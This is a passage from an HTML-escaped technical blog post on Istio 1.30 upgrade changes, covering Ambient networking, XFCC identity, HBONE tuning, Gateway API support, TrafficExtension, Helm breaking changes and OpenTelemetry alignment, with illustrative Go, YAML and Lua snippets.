  &lt;span class="na"&gt;resolution&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STATIC&lt;/span&gt;
  &lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10.20.0.0/24&lt;/span&gt;   &lt;span class="c1"&gt;# ← 1.30 accepts CIDR directly&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
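&lt;p&gt;Longest-prefix match means that when several CIDRs cover the same destination, the most specific one wins. The Go sketch below shows the idea with a map keyed by masked prefix, probed from the longest prefix length down. &lt;code&gt;cidrTable&lt;/code&gt; and the two extra ranges and hostnames are hypothetical, and ztunnel itself is written in Rust, so its actual data structure may differ.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"fmt"
	"net/netip"
)

// cidrTable maps a masked prefix to the service host that owns it.
type cidrTable map[netip.Prefix]string

// add registers a CIDR; Masked() normalizes e.g. 10.20.0.7/24 to 10.20.0.0/24.
func (t cidrTable) add(cidr, host string) {
	t[netip.MustParsePrefix(cidr).Masked()] = host
}

// lookup returns the host whose prefix is the longest match for ip, probing
// from the most specific prefix length (/32 or /128) down to /0.
func (t cidrTable) lookup(ip netip.Addr) (string, bool) {
	ip = ip.Unmap()
	for bits := ip.BitLen(); bits != -1; bits-- {
		p, err := ip.Prefix(bits)
		if err != nil {
			return "", false
		}
		if host, ok := t[p]; ok {
			return host, true
		}
	}
	return "", false
}

func main() {
	table := cidrTable{}
	table.add("10.20.0.0/24", "legacy.internal")             // the ServiceEntry above
	table.add("10.20.0.128/25", "legacy-reporting.internal") // hypothetical narrower entry
	table.add("10.0.0.0/8", "corp-catchall.internal")        // hypothetical wider entry

	for _, s := range []string{"10.20.0.10", "10.20.0.200", "10.99.1.1", "192.168.1.1"} {
		host, ok := table.lookup(netip.MustParseAddr(s))
		fmt.Printf("%-12s matched=%v host=%q\n", s, ok, host)
	}
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;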



&lt;h3&gt;
  
  
  4.2 Optional XFCC synthesis at waypoints
&lt;/h3&gt;

&lt;p&gt;In Ambient, ztunnel handles mTLS and HBONE; waypoints handle L7 policy. If an upstream application needs to see &lt;em&gt;who originally called&lt;/em&gt; via &lt;code&gt;x-forwarded-client-cert&lt;/code&gt;, that wasn't possible — there was no path to surface ztunnel's SPIFFE identity at the waypoint. 1.30 adds the annotation &lt;code&gt;ambient.istio.io/xfcc-include-client-identity: "true"&lt;/code&gt; on a waypoint &lt;code&gt;Gateway&lt;/code&gt; (or its &lt;code&gt;GatewayClass&lt;/code&gt;). The waypoint &lt;strong&gt;synthesizes and overwrites XFCC&lt;/strong&gt; using the ztunnel-provided source workload SPIFFE identity. Any inbound XFCC value is discarded, so a client that tried to spoof the header gets ignored.&lt;/p&gt;
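&lt;p&gt;On the receiving side, the upstream service then reads the synthesized header. A minimal Go handler sketch follows; it assumes the waypoint emits XFCC in Envoy's usual layout, with the client's SPIFFE ID under the &lt;code&gt;URI&lt;/code&gt; key, and it deliberately skips quoted values that contain separators. The sample header value and the &lt;code&gt;clientSPIFFEID&lt;/code&gt; and &lt;code&gt;whoCalled&lt;/code&gt; helpers are illustrative, not taken from the release.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// clientSPIFFEID returns the URI (SPIFFE ID) from the last element of an
// x-forwarded-client-cert value. Elements are comma-separated and key=value
// pairs inside an element are semicolon-separated. Quoted values containing
// "," or ";" are not handled in this sketch.
func clientSPIFFEID(xfcc string) (string, bool) {
	elements := strings.Split(xfcc, ",")
	last := elements[len(elements)-1]
	for _, pair := range strings.Split(last, ";") {
		key, val, found := strings.Cut(strings.TrimSpace(pair), "=")
		if !found {
			continue
		}
		if !strings.EqualFold(key, "URI") {
			continue
		}
		val = strings.Trim(val, "\"")
		if strings.HasPrefix(val, "spiffe://") {
			return val, true
		}
	}
	return "", false
}

// whoCalled reports the caller identity. Trusting the header is only safe if
// all traffic reaches this app through the waypoint, which overwrites any
// client-supplied XFCC before forwarding.
func whoCalled(w http.ResponseWriter, r *http.Request) {
	id, ok := clientSPIFFEID(r.Header.Get("X-Forwarded-Client-Cert"))
	if !ok {
		http.Error(w, "no client identity", http.StatusForbidden)
		return
	}
	fmt.Fprintln(w, "caller:", id)
}

func main() {
	req := httptest.NewRequest(http.MethodGet, "/", nil)
	req.Header.Set("X-Forwarded-Client-Cert",
		"By=spiffe://cluster.local/ns/team-b/sa/backend;URI=spiffe://cluster.local/ns/team-a/sa/api")
	rec := httptest.NewRecorder()
	whoCalled(rec, req)
	fmt.Print(rec.Body.String()) // caller: spiffe://cluster.local/ns/team-a/sa/api
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;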

&lt;h3&gt;
  
  
  4.3 HBONE window-size tuning + ztunnel Tokio metrics
&lt;/h3&gt;

&lt;p&gt;High-throughput Ambient workloads were reporting buffering / throughput loss caused by small initial HTTP/2 window sizes on HBONE CONNECT upstream clusters. Two environment variables tune this in 1.30, with two more relevant networking knobs landing in the same release.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Env var&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PILOT_HBONE_INITIAL_STREAM_WINDOW_SIZE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Envoy default&lt;/td&gt;
&lt;td&gt;Initial stream window for HBONE CONNECT (waypoints / E-W gateways)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PILOT_HBONE_INITIAL_CONNECTION_WINDOW_SIZE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Envoy default&lt;/td&gt;
&lt;td&gt;Initial connection window for HBONE CONNECT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DNS_FORWARD_TIMEOUT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;5s&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Upstream DNS timeout (failover trigger)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PILOT_GATEWAY_TRANSPORT_SOCKET_CONNECT_TIMEOUT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;15s&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gateway listener TLS handshake timeout; &lt;code&gt;0s&lt;/code&gt; disables&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
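&lt;p&gt;A useful rule of thumb when choosing values: a single HTTP/2 stream cannot deliver more than one flow-control window per round trip, so the window has to cover at least the bandwidth-delay product. The Go helpers below just do that arithmetic. The 10 Gbit/s and 2 ms figures are example inputs, 65,535 bytes is the HTTP/2 protocol default initial window from RFC 9113, and the result is a starting point for &lt;code&gt;PILOT_HBONE_INITIAL_STREAM_WINDOW_SIZE&lt;/code&gt; to validate under load, not a recommended setting.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"fmt"
	"time"
)

// requiredWindowBytes is the bandwidth-delay product: the bytes that must be
// in flight (sent but not yet acknowledged) to sustain targetBitsPerSec over a
// path with round-trip time rtt.
func requiredWindowBytes(targetBitsPerSec int64, rtt time.Duration) int64 {
	return targetBitsPerSec / 8 * rtt.Nanoseconds() / int64(time.Second)
}

// ceilingBitsPerSec is the best-case throughput of one stream whose
// flow-control window is windowBytes: at most one full window per RTT.
// rtt must be non-zero.
func ceilingBitsPerSec(windowBytes int64, rtt time.Duration) int64 {
	return windowBytes * 8 * int64(time.Second) / rtt.Nanoseconds()
}

func main() {
	// 65,535 bytes is the HTTP/2 default initial window (RFC 9113).
	fmt.Println(ceilingBitsPerSec(65535, time.Millisecond))               // 524280000 (about 524 Mbit/s)
	fmt.Println(requiredWindowBytes(10_000_000_000, 2*time.Millisecond)) // 2500000 (2.5 MB)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The connection window caps the total across all streams multiplexed on one HBONE connection, so &lt;code&gt;PILOT_HBONE_INITIAL_CONNECTION_WINDOW_SIZE&lt;/code&gt; should be at least as large as the stream window, and larger when several busy streams share a connection.&lt;/p&gt;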

&lt;p&gt;Observability follows. ztunnel now exposes &lt;strong&gt;Tokio runtime metrics&lt;/strong&gt; (worker queue depths, blocking thread usage), and the official Grafana dashboard adds a &lt;strong&gt;ztunnel Resource Usage&lt;/strong&gt; panel that overlays active TCP connections, open file descriptors, and open sockets per instance — a one-screen view of ztunnel pressure that previously had to be inferred indirectly.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Gateway API v1.5 — TLSRoute Termination, Mixed Mode, BackendTLSPolicy v1
&lt;/h2&gt;

&lt;p&gt;Istio 1.30 catches up with Gateway API v1.5 GA.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gateway API v1.5 capability&lt;/th&gt;
&lt;th&gt;Istio 1.30 support&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;TLSRoute&lt;/code&gt; termination + mixed mode&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A single Gateway can mix terminating and passthrough TLS listeners&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TLS passthrough listeners on east-west gateways&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Non-HBONE ports (e.g., K8s API server across networks) reachable via Gateway API; requires &lt;code&gt;AMBIENT_ENABLE_MULTI_NETWORK&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;protocol: TLS&lt;/code&gt; Gateway listener accepted by default&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Default on&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No more &lt;code&gt;PILOT_ENABLE_ALPHA_GATEWAY_API=true&lt;/code&gt; to get TLS passthrough&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;AttachedListenerSets&lt;/code&gt; status&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Gateway status reports number of attached ListenerSets, plus per-listener route counts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;FrontendTLSValidation&lt;/code&gt; (GEP-91)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enables mTLS ingress gateway configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;HTTPRoute&lt;/code&gt; + &lt;code&gt;GRPCRoute&lt;/code&gt; host coexistence&lt;/td&gt;
&lt;td&gt;Fixed&lt;/td&gt;
&lt;td&gt;Same gateway hostname can host both without conflict&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Empty &lt;code&gt;backendRefs&lt;/code&gt; on &lt;code&gt;HTTPRoute&lt;/code&gt; returns 404&lt;/td&gt;
&lt;td&gt;Fixed&lt;/td&gt;
&lt;td&gt;Previously incorrectly returned 500&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  6. TrafficExtension API — the beginning of WasmPlugin's deprecation
&lt;/h2&gt;

&lt;p&gt;Proxy extensibility in Istio has been split across &lt;code&gt;EnvoyFilter&lt;/code&gt;, &lt;code&gt;WasmPlugin&lt;/code&gt;, and &lt;code&gt;TelemetryAPI&lt;/code&gt;. 1.30 consolidates Wasm and Lua extensibility behind the new &lt;strong&gt;&lt;code&gt;TrafficExtension&lt;/code&gt;&lt;/strong&gt; API. The same resource targets sidecars, gateways, and waypoints.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;extensions.istio.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TrafficExtension&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;rate-limit-lua&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ingress&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;selector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;istio&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ingressgateway&lt;/span&gt;
  &lt;span class="na"&gt;phase&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AUTHN&lt;/span&gt;     &lt;span class="c1"&gt;# or AUTHZ / STATS&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;LUA&lt;/span&gt;        &lt;span class="c1"&gt;# or WASM&lt;/span&gt;
  &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;inlineCode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;function envoy_on_request(handle)&lt;/span&gt;
        &lt;span class="s"&gt;local h = handle:headers():get("x-api-key")&lt;/span&gt;
        &lt;span class="s"&gt;if h == nil then&lt;/span&gt;
          &lt;span class="s"&gt;handle:respond({[":status"] = "401"}, "missing api key")&lt;/span&gt;
        &lt;span class="s"&gt;end&lt;/span&gt;
      &lt;span class="s"&gt;end&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;WasmPlugin&lt;/code&gt; still works, but new feature investment is moving to &lt;code&gt;TrafficExtension&lt;/code&gt;, and a deprecation timeline for &lt;code&gt;WasmPlugin&lt;/code&gt; is expected in a future release. New extensibility work should target &lt;code&gt;TrafficExtension&lt;/code&gt; from the start, keeping in mind that the API is still &lt;code&gt;v1alpha1&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. Helm v4 SSA + the breaking-change matrix
&lt;/h2&gt;

&lt;p&gt;1.30 ships first-class &lt;strong&gt;Helm v4 (Server-Side Apply)&lt;/strong&gt; support. The longstanding &lt;code&gt;ValidatingWebhookConfiguration&lt;/code&gt; &lt;code&gt;failurePolicy&lt;/code&gt; ownership conflict — which broke &lt;code&gt;helm upgrade&lt;/code&gt; under SSA — is resolved by omitting &lt;code&gt;failurePolicy&lt;/code&gt; from the webhook template on upgrade and preserving the runtime value set by the webhook controller. Tooling that respects &lt;code&gt;.Release.IsUpgrade&lt;/code&gt; (Helm 4, Flux) just works. If you use &lt;code&gt;helm template&lt;/code&gt; with SSA, set &lt;code&gt;base.validationFailurePolicy: Fail&lt;/code&gt; explicitly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Istio 1.29 → 1.30 breaking-change matrix
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;1.29 behavior&lt;/th&gt;
&lt;th&gt;1.30 behavior&lt;/th&gt;
&lt;th&gt;Revert&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CNI config file permissions&lt;/td&gt;
&lt;td&gt;0644&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0600 (CIS Kubernetes Benchmark v1.12)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;values.cni.env.CNI_CONF_GROUP_READ=true&lt;/code&gt; → 0640&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CNI Agent &lt;code&gt;excludeNamespaces&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin only; agent ignored it&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Agent now honors it — already-enrolled pods get un-enrolled&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sidecar hostname namespace pick (multiple namespaces)&lt;/td&gt;
&lt;td&gt;First alphabetically&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Kubernetes &lt;code&gt;Service&lt;/code&gt; preferred → oldest non-K8s service by creation time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;PILOT_SIDECAR_PICK_BEST_SERVICE_NAMESPACE=false&lt;/code&gt; or &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;XDS debug endpoints (15010)&lt;/td&gt;
&lt;td&gt;No auth&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=true&lt;/code&gt; default — auth required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=false&lt;/code&gt; (not recommended)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Untaint controller&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;PILOT_ENABLE_NODE_UNTAINT_CONTROLLERS&lt;/code&gt; set manually&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Auto-configured from Helm &lt;code&gt;taint.enabled&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default image registry&lt;/td&gt;
&lt;td&gt;Previous registry&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;registry.istio.io&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Old registry still reachable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported Kubernetes&lt;/td&gt;
&lt;td&gt;1.31 – 1.35&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1.32 – 1.36&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Stay on 1.29 LTS for K8s 1.31&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two changes most likely to bite are (a) &lt;strong&gt;XDS debug auth becoming the default&lt;/strong&gt;, which can abruptly start returning 401s to internal tools that call &lt;code&gt;istioctl … --plaintext&lt;/code&gt;, and (b) &lt;strong&gt;the flipped sidecar hostname matching order&lt;/strong&gt;, which can quietly reroute traffic in environments where the same hostname is served by both a Kubernetes &lt;code&gt;Service&lt;/code&gt; and a &lt;code&gt;ServiceEntry&lt;/code&gt;. The latter has a clean revert path via &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt; while you plan the actual migration.&lt;/p&gt;
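&lt;p&gt;To see how the ordering change can reroute traffic, here is a simplified Go model of the two rules in the matrix row: 1.29 takes the alphabetically first namespace, while 1.30 prefers a Kubernetes &lt;code&gt;Service&lt;/code&gt; and otherwise the oldest non-Kubernetes service by creation time. The &lt;code&gt;candidate&lt;/code&gt; type, the namespaces, and the oldest-wins tie-break between two services of the same kind are assumptions for illustration; the upgrade notes remain the authority on the exact rules.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"fmt"
	"strings"
	"time"
)

// candidate is a hypothetical view of one service that declares the hostname.
type candidate struct {
	Namespace  string
	Kubernetes bool      // true for a Kubernetes Service, false for e.g. a ServiceEntry
	Created    time.Time // creation timestamp
}

// pick129 models the 1.29 rule: the alphabetically first namespace wins.
// cs must be non-empty.
func pick129(cs []candidate) candidate {
	best := cs[0]
	for _, c := range cs[1:] {
		if strings.Compare(c.Namespace, best.Namespace) == -1 {
			best = c
		}
	}
	return best
}

// pick130 models the 1.30 rule: a Kubernetes Service beats any non-Kubernetes
// service; among services of the same kind the oldest wins (assumed tie-break).
// cs must be non-empty.
func pick130(cs []candidate) candidate {
	best := cs[0]
	for _, c := range cs[1:] {
		switch {
		case c.Kubernetes != best.Kubernetes:
			if c.Kubernetes {
				best = c
			}
		case c.Created.Before(best.Created):
			best = c
		}
	}
	return best
}

func main() {
	t0 := time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC)
	cs := []candidate{
		{Namespace: "aaa-legacy", Created: t0.Add(48 * time.Hour)},
		{Namespace: "payments", Kubernetes: true, Created: t0.Add(72 * time.Hour)},
		{Namespace: "mirror", Created: t0},
	}
	fmt.Println("1.29 picks:", pick129(cs).Namespace) // aaa-legacy
	fmt.Println("1.30 picks:", pick130(cs).Namespace) // payments
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;In this example a &lt;code&gt;ServiceEntry&lt;/code&gt; in &lt;code&gt;aaa-legacy&lt;/code&gt; used to win purely on its name; after the upgrade the Kubernetes &lt;code&gt;Service&lt;/code&gt; in &lt;code&gt;payments&lt;/code&gt; wins instead, which is exactly the kind of silent reroute worth catching in staging.&lt;/p&gt;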

&lt;h2&gt;
  
  
  8. OpenTelemetry Semantic Conventions alignment — telemetry migration
&lt;/h2&gt;

&lt;p&gt;Final move: 1.30 aligns Istio's trace span attributes to the &lt;strong&gt;OpenTelemetry Kubernetes service attributes spec&lt;/strong&gt;. With &lt;code&gt;serviceAttributeEnrichment: OTEL_SEMANTIC_CONVENTIONS&lt;/code&gt; set on &lt;code&gt;OpenTelemetryTracingProvider&lt;/code&gt;, Istio derives &lt;code&gt;service.name&lt;/code&gt;, &lt;code&gt;service.namespace&lt;/code&gt;, &lt;code&gt;service.version&lt;/code&gt;, and &lt;code&gt;service.instance.id&lt;/code&gt; via the OTel fallback chain.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;install.istio.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;IstioOperator&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;istio-system&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;istio-control&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;meshConfig&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;extensionProviders&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;otel-collector&lt;/span&gt;
      &lt;span class="na"&gt;opentelemetry&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;opentelemetry-collector.observability.svc&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4317&lt;/span&gt;
        &lt;span class="na"&gt;serviceAttributeEnrichment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;OTEL_SEMANTIC_CONVENTIONS&lt;/span&gt;  &lt;span class="c1"&gt;# ← 1.30&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;telemetry.istio.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Telemetry&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tracing-egress-no-propagation&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;egress&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;tracing&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;providers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;otel-collector&lt;/span&gt;
    &lt;span class="na"&gt;randomSamplingPercentage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;100.0&lt;/span&gt;
    &lt;span class="na"&gt;disableContextPropagation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# ← 1.30: stop trace context leaking to external services&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;source_app&lt;/code&gt; / &lt;code&gt;destination_app&lt;/code&gt; metric labels previously depended on the &lt;code&gt;app&lt;/code&gt; label. From 1.30 they fall back to &lt;code&gt;app.kubernetes.io/name&lt;/code&gt;, then &lt;code&gt;service.istio.io/canonical-name&lt;/code&gt;. Teams that standardized on Helm/Kustomize/Argo CD labels without an explicit &lt;code&gt;app&lt;/code&gt; label finally get populated metrics out of the box.&lt;/p&gt;
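&lt;p&gt;Expressed as code, the fallback order is a simple first-non-empty lookup. This Go sketch mirrors only the order stated above; the &lt;code&gt;appLabel&lt;/code&gt; name, the treatment of empty values as absent, and the &lt;code&gt;unknown&lt;/code&gt; placeholder are assumptions.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import "fmt"

// appLabel returns the value used for the source_app / destination_app metric
// labels under the 1.30 fallback order: app, then app.kubernetes.io/name, then
// service.istio.io/canonical-name. Treating an empty value as absent is an
// assumption of this sketch.
func appLabel(labels map[string]string) string {
	for _, key := range []string{"app", "app.kubernetes.io/name", "service.istio.io/canonical-name"} {
		if v := labels[key]; v != "" {
			return v
		}
	}
	return "unknown" // assumed placeholder when none of the labels is set
}

func main() {
	// Typical Helm/Kustomize/Argo CD labels with no plain "app" label.
	helmStyle := map[string]string{
		"app.kubernetes.io/name":     "checkout",
		"app.kubernetes.io/instance": "checkout-prod",
	}
	fmt.Println(appLabel(helmStyle)) // checkout

	// An explicit "app" label still takes precedence.
	both := map[string]string{"app": "cart", "app.kubernetes.io/name": "cart-v2"}
	fmt.Println(appLabel(both)) // cart
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;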

&lt;h2&gt;
  
  
  9. Lab upgrade checklist (EKS 1.33 + Ambient)
&lt;/h2&gt;

&lt;p&gt;Below is the validation sequence we ran on a lab cluster (&lt;em&gt;EKS 1.33, Ambient mode, two networks, 7 ztunnel nodes, 3 waypoints&lt;/em&gt;) upgrading from 1.29.2 → 1.30.0.&lt;/p&gt;

